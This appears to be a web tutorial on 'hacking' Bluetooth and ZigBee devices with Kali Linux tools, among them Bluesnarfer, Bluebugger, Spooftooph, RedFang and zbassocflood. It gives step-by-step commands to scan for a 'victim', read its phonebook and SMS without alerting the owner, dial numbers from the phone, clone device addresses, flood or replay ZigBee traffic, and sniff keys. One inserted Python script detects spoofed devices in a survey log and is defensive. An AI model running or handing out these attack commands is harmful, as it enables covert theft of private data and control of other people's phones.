
How To Hack Bluetooth And Other Wireless Tools Using Kali Linux

Blooover performs the Bluebug attack. To install the application you need a phone that has the Java Bluetooth API implemented. Through Bluebug it can perform the following actions on a vulnerable target:

  • Reading phonebooks
  • Writing phonebook entries
  • Reading/decoding SMS stored on the device
  • Setting call forwarding
  • Initiating phone calls



Bluelog is a Linux Bluetooth scanner with optional daemon mode and web front-end, designed for site surveys and traffic monitoring. It’s intended to be run for long periods of time in a static location to determine how many discoverable Bluetooth devices there are in the area.

Use the command below to record details of nearby discoverable Bluetooth devices in a log file named btdevices.log:

bluelog -i hci0 -o /root/Desktop/btdevices.log -v

The following command additionally records the manufacturer (-m), broadcast name (-n) and device class (-c) of each device:

bluelog -i hci0 -mnc -o /root/Desktop/btdevices2.log -v


BlueMaho: Bluetooth Hacker App

BlueMaho is a GUI shell for a suite of tools for testing the security of Bluetooth devices. It is freeware, open source, written in Python, and uses wxPython. It can be used to test BT devices for known vulnerabilities and, more importantly, to look for unknown ones. It can also produce useful statistics.

BlueMaho is an integrated Bluetooth scanning/hacking tool; here we will simply use it for scanning. You can start BlueMaho’s GUI by typing:

When you do, it opens a GUI. Here, I have clicked on the “get SDP info” and hit the play button to the left. BlueMaho begins scanning for discoverable devices, and like the other tools, it finds two Bluetooth devices.

In the bottom window, BlueMaho displays more info from the scanned devices. I have copied that info and placed it into a text file to make it easier for you to read.

Note that it displays the name of the first device and describes its device type as “Audio/Video, Headset profile.” It then identifies the second device and reports its device type as “Phone, Smartphone.”

Now that we know how to gather information on the Bluetooth devices in our range,


BlueRanger is a simple Bash script that uses link quality to locate Bluetooth device radios. It sends L2CAP (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory).

Use a Bluetooth Class 1 adapter for long-range location detection. Switch to a Class 3 adapter for more precise short-range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion.

Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):

root@kali:~# blueranger.sh hci1 20:C9:D0:43:4B:D8

Bluesnarfer

Bluesnarfer downloads the phonebook of any mobile device vulnerable to Bluesnarfing. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner and gain access to restricted portions of the stored data.

Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):

root@kali:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i

Hack Mobile Bluetooth Using Bluesnarfer

Check the configuration and bring the adapter up.

hciconfig hci0 up

Good, hci0 is up and ready to work!

Scan for victims.

hcitool scan

Ping the victim device to see if the device is awake.

l2ping <victim MAC addr>

Browse the victim for RFCOMM channels to connect to.

sdptool browse --tree --l2cap <mac addr>

Then you can use bluesnarfer, for example, to read the victim’s phonebook, dial a number, read SMS or other things.

bluesnarfer -r 1-100 -C 7 -b <mac addr>

To see the available options:

bluebugger -h

Dial a number.

bluebugger -m <victim name> -c 7 -a <mac addr> Dial <number>

Btscanner: Hack Bluetooth In Kali Linux

The Btscanner tool can capture information from a Bluetooth device without pairing. The package is very small (only 1.05 MB) and easy to install. Btscanner searches for devices and lists them on screen; if you want more information about one, just hit enter and it will show the device’s details, including its MAC address.

1. Start the Bluetooth service with this command.

Syntax: service bluetooth start

2. Now open btscanner with this command.

Syntax: btscanner

3. Follow the instructions shown on screen; in my case, pressing i starts the scan.

4. Now you see the list of Bluetooth devices found.

5. Select a device with the arrow keys and press enter to get full information about it.


RedFang is a small proof-of-concept application to find non-discoverable Bluetooth devices. This is done by brute-forcing the last six (6) bytes of the Bluetooth address of the device and doing a read_remote_name().

Scan the given range (-r 00803789EE76-00803789EEff) and discover Bluetooth devices (-s):

root@kali:~# fang -r 00803789EE76-00803789EEff -s


Spooftooph is designed to automate spoofing or cloning of Bluetooth device information: the device Name, Class, and Address. Cloning this information effectively allows Bluetooth devices to hide in plain sight. When more than one device in range shares the same device information (specifically the same Address) while in Discoverable Mode, Bluetooth scanning software will list only one of them.

Normally most of us never intend to audit the Bluetooth stack in an organization, but this tool can be interesting in an environment where Bluetooth devices have been paired with important hardware.

Use the Bluetooth interface (-i hci1) to spoof itself as the given address (-a 00803789EE76):

root@kali:~# spooftooph -i hci1 -a 00803789EE76
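The cloning behaviour described above is exactly what a long-running site survey (as Bluelog collects) can be checked for: an address whose name/class changes over time, or one name/class identity that appears under several addresses. The script below is an added example, not code from this page or from the Bluelog/Spooftooph projects; it assumes a constructed log format of "timestamp,address,name,class" per sighting (not Bluelog's real output) and uses constructed sample lines.

```python
import re
from collections import defaultdict

# Constructed sample survey log (assumed format, not bluelog's actual output):
# one sighting per line as "timestamp,address,name,class".
SAMPLE_LOG = """\
2024-01-01 09:00:01,20:C9:D0:43:4B:D8,Galaxy,0x5a020c
2024-01-01 09:05:12,20:C9:D0:43:4B:D8,Galaxy,0x5a020c
2024-01-01 09:10:44,00:80:37:89:EE:76,Jabra Headset,0x240404
2024-01-01 09:15:03,00:80:37:89:EE:76,Conference Printer,0x080680
2024-01-01 09:20:30,AA:BB:CC:DD:EE:01,Jabra Headset,0x240404
"""

LINE_RE = re.compile(
    r"^(?P<ts>[^,]+),"
    r"(?P<addr>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}),"
    r"(?P<name>[^,]*),"
    r"(?P<cls>0x[0-9A-Fa-f]{6})$"
)

def parse_log(text):
    """Return one dict per well-formed sighting; malformed lines are skipped."""
    sightings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["addr"] = d["addr"].upper()   # normalise for comparison
            sightings.append(d)
    return sightings

def survey_summary(sightings):
    """Site-survey view: sightings per distinct discoverable address."""
    counts = defaultdict(int)
    for s in sightings:
        counts[s["addr"]] += 1
    return dict(counts)

def spoof_indicators(sightings):
    """Return (changed, cloned): addresses whose name/class identity varied,
    and name/class identities that were seen under more than one address."""
    identity_by_addr = defaultdict(set)
    addrs_by_identity = defaultdict(set)
    for s in sightings:
        ident = (s["name"], s["cls"].lower())
        identity_by_addr[s["addr"]].add(ident)
        addrs_by_identity[ident].add(s["addr"])
    changed = {a: sorted(i) for a, i in identity_by_addr.items() if len(i) > 1}
    cloned = {i: sorted(a) for i, a in addrs_by_identity.items() if len(a) > 1}
    return changed, cloned
```

Either indicator on its own is only a hint (devices do get renamed, and a scanner may simply miss one of two identical devices), so treat hits as items to verify against the site's inventory rather than as proof of spoofing.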

Other Wireless Tools

Transmit a flood of associate requests to a target network.

zbassocflood [-pcDis] [-i devnumstring] [-p PAN ID] [-c channel] [-s per-packet delay/float]

zbassocflood -p 0xBAAD -c 11 -s 0.1


zbdsniff: decode plaintext ZigBee key delivery from a capture file. Will process libpcap or Daintree SNA capture files.

zbdsniff [capturefiles …]


zbdump: a tcpdump-like tool for ZigBee/IEEE 802.15.4 networks. Compatible with Wireshark 1.1.2 and later.

zbdump [-fiwDch] [-f channel] [-w pcapfile] [-W daintreefile] [-i devnumstring]


zbfind provides a GTK-based GUI to the user which displays the results of a zbstumbler-like functionality. zbfind sends beacon requests as it cycles through channels and listens for a response, adding the response to a table as well as displaying signal strength on a gauge widget.


zbgoodfind: search a binary file to identify the encryption key for a given SNA or libpcap IEEE 802.15.4 encrypted packet.

zbgoodfind [-frRFd] [-f binary file] [-r pcapfile] [-R daintreefile] [-F Don’t skip 2-byte FCS at end of each frame] [-d generate binary file (test mode)]


zbreplay: replay ZigBee/802.15.4 network traffic from libpcap or Daintree files.

zbreplay [-rRfiDch] [-f channel] [-r pcapfile] [-R daintreefile] [-i devnumstring] [-s delay/float] [-c countpackets]


Transmit beacon request frames to the broadcast address while channel hopping to identify ZC/ZR devices.
